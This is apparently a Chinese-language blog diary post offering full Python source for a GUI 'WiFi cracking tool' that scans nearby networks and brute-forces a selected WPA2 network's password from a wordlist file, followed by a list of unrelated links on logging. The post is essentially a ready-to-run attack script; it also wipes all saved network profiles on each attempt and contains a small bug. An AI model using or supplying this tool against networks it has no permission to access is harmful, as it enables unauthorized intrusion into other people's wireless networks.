日誌12月16日
今天wifi密碼剛好忘了,陳封萬年的程式碼可以排上用場了:
from tkinter import *
from tkinter import ttk
import pywifi
from pywifi import const
import time
import tkinter.filedialog # 在Gui中開啟檔案瀏覽
import tkinter.messagebox # 開啟tkiner的訊息提醒框
class MY_GUI():
def __init__(self,init_window_name):
self.init_window_name = init_window_name
#密碼檔案路徑
self.get_value = StringVar() # 設定可變內容
#獲取破解wifi賬號
self.get_wifi_value = StringVar()
#獲取wifi密碼
self.get_wifimm_value = StringVar()
self.wifi = pywifi.PyWiFi() #抓取網路卡介面
self.iface = self.wifi.interfaces()[0] #抓取第一個無線網路卡
self.iface.disconnect() #測試連結斷開所有連結
time.sleep(1) #休眠1秒
#測試網路卡是否屬於斷開狀態
assert self.iface.status() in\
[const.IFACE_DISCONNECTED, const.IFACE_INACTIVE]
def __str__(self):
# 自動會呼叫的函式,返回自身的網路卡
return '(WIFI:%s,%s)' % (self.wifi,self.iface.name())
#設定視窗
def set_init_window(self):
self.init_window_name.title("WIFI破解工具")
self.init_window_name.geometry('+500+200')
labelframe = LabelFrame(width=400, height=200,text="配置") # 框架,以下物件都是對於labelframe中新增的
labelframe.grid(column=0, row=0, padx=10, pady=10)
self.search = Button(labelframe,text="搜尋附近WiFi",command=self.scans_wifi_list).grid(column=0,row=0)
self.pojie = Button(labelframe,text="開始破解",command=self.readPassWord).grid(column=1,row=0)
self.label = Label(labelframe,text="目錄路徑:").grid(column=0,row=1)
self.path = Entry(labelframe,width=12,textvariable = self.get_value).grid(column=1,row=1)
self.file = Button(labelframe,text="新增密碼檔案目錄",command=self.add_mm_file).grid(column=2,row=1)
self.wifi_text = Label(labelframe,text="WiFi賬號:").grid(column=0,row=2)
self.wifi_input = Entry(labelframe,width=12,textvariable = self.get_wifi_value).grid(column=1,row=2)
self.wifi_mm_text = Label(labelframe,text="WiFi密碼:").grid(column=2,row=2)
self.wifi_mm_input = Entry(labelframe,width=10,textvariable = self.get_wifimm_value).grid(column=3,row=2,sticky=W)
self.wifi_labelframe = LabelFrame(text="wifi列表")
self.wifi_labelframe.grid(column=0, row=3,columnspan=4,sticky=NSEW)
# 定義樹形結構與滾動條
self.wifi_tree = ttk.Treeview(self.wifi_labelframe,show="headings",columns=("a", "b", "c", "d"))
self.vbar = ttk.Scrollbar(self.wifi_labelframe, orient=VERTICAL, command=self.wifi_tree.yview)
self.wifi_tree.configure(yscrollcommand=self.vbar.set)
# 表格的標題
self.wifi_tree.column("a", width=50, anchor="center")
self.wifi_tree.column("b", width=100, anchor="center")
self.wifi_tree.column("c", width=100, anchor="center")
self.wifi_tree.column("d", width=100, anchor="center")
self.wifi_tree.heading("a", text="WiFiID")
self.wifi_tree.heading("b", text="SSID")
self.wifi_tree.heading("c", text="BSSID")
self.wifi_tree.heading("d", text="signal")
self.wifi_tree.grid(row=4,column=0,sticky=NSEW)
self.wifi_tree.bind("<Double-1>",self.onDBClick)
self.vbar.grid(row=4,column=1,sticky=NS)
#搜尋wifi
#cmd /k C:\Python27\python.exe "$(FULL_CURRENT_PATH)" & PAUSE & EXIT
def scans_wifi_list(self): # 掃描周圍wifi列表
#開始掃描
print("^_^ 開始掃描附近wifi...")
self.iface.scan()
time.sleep(15)
#在若干秒後獲取掃描結果
scanres = self.iface.scan_results()
#統計附近被發現的熱點數量
nums = len(scanres)
print("數量: %s"%(nums))
#print ("| %s | %s | %s | %s"%("WIFIID","SSID","BSSID","signal"))
# 實際資料
self.show_scans_wifi_list(scanres)
return scanres
#顯示wifi列表
def show_scans_wifi_list(self,scans_res):
for index,wifi_info in enumerate(scans_res):
# print("%-*s| %s | %*s |%*s\n"%(20,index,wifi_info.ssid,wifi_info.bssid,,wifi_info.signal))
self.wifi_tree.insert("",'end',values=(index + 1,wifi_info.ssid,wifi_info.bssid,wifi_info.signal))
#print("| %s | %s | %s | %s \n"%(index,wifi_info.ssid,wifi_info.bssid,wifi_info.signal))
#新增密碼檔案目錄
def add_mm_file(self):
self.filename = tkinter.filedialog.askopenfilename()
self.get_value.set(self.filename)
#Treeview繫結事件
def onDBClick(self,event):
self.sels= event.widget.selection()
self.get_wifi_value.set(self.wifi_tree.item(self.sels,"values")[1])
#print("you clicked on",self.wifi_tree.item(self.sels,"values")[1])
#讀取密碼字典,進行匹配
def readPassWord(self):
self.getFilePath = self.get_value.get()
self.get_wifissid = self.get_wifi_value.get()
pwdfilehander=open(self.getFilePath,"r",errors="ignore")
while True:
try:
self.pwdStr=pwdfilehander.readline()
if not self.pwdStr:
break
self.bool1=self.connect(self.pwdStr,self.get_wifissid)
if self.bool1:
self.res = "===正確=== wifi名:%s 匹配密碼:%s "%(self.get_wifissid,self.pwdStr)
self.get_wifimm_value.set(self.pwdStr)
tkinter.messagebox.showinfo('提示', '破解成功!!!')
print(self.res)
break
else:
self.res = "---錯誤--- wifi名:%s匹配密碼:%s"%(self.get_wifissid,self.pwdStr)
print(self.res)
sleep(3)
except:
continue
#對wifi和密碼進行匹配
def connect(self,pwd_Str,wifi_ssid):
#建立wifi連結檔案
self.profile = pywifi.Profile()
self.profile.ssid =wifi_ssid #wifi名稱
self.profile.auth = const.AUTH_ALG_OPEN #網路卡的開放
self.profile.akm.append(const.AKM_TYPE_WPA2PSK)#wifi加密演算法
self.profile.cipher = const.CIPHER_TYPE_CCMP #加密單元
self.profile.key = pwd_Str #密碼
self.iface.remove_all_network_profiles() #刪除所有的wifi檔案
self.tmp_profile = self.iface.add_network_profile(self.profile)#設定新的連結檔案
self.iface.connect(self.tmp_profile)#連結
time.sleep(5)
if self.iface.status() == const.IFACE_CONNECTED: #判斷是否連線上
isOK=True
else:
isOK=False
self.iface.disconnect() #斷開
time.sleep(1)
#檢查斷開狀態
assert self.iface.status() in\
[const.IFACE_DISCONNECTED, const.IFACE_INACTIVE]
return isOK
def gui_start():
init_window = Tk()
ui = MY_GUI(init_window)
print(ui)
ui.set_init_window()
#ui.scans_wifi_list()
init_window.mainloop()
gui_start()
相關文章
- 日誌分析-apache日誌分析Apache
- [日誌分析篇]-利用ELK分析jumpserver日誌-日誌拆分篇Server
- 日誌
- 【Spring】日誌列印sql,日誌配置列印sqlSpringSQL
- [Java/日誌] 日誌框架列印應用程式日誌程式碼的執行情況Java框架
- CMS日誌
- 日誌配置
- mybatis日誌MyBatis
- Weblogic日誌Web
- ros 日誌ROS
- Log日誌
- 日誌列印
- Loggiing日誌
- Mysql日誌MySql
- 日誌01
- 日誌管理
- ELK日誌
- [技術分享]日誌切割(按天切割日誌)
- 日誌篇:模組日誌總體介紹
- 【MySQL日誌】MySQL日誌檔案初級管理MySql
- 日誌11月4日
- 日誌11月18日
- 日誌11月24日
- 【REDO】Oracle 日誌挖掘,分析歸檔日誌線上日誌主要步驟Oracle
- Go中使用Zap日誌庫與Lumberjack日誌切割Go
- Kubernetes 叢集日誌 和 EFK 架構日誌方案架構
- lumen cli日誌和普通日誌分開儲存
- 日誌服務之使用Nginx模式採集日誌Nginx模式
- 【Oracle】歸檔日誌管理-設定歸檔日誌路徑以及歸檔日誌冗餘Oracle
- python日誌配置Python
- crash日誌分析
- Crash日誌解析
- 重做日誌管理
- 實訓日誌
- Python 日誌(Log)Python
- 日誌服務
- 專案日誌
- 日誌模組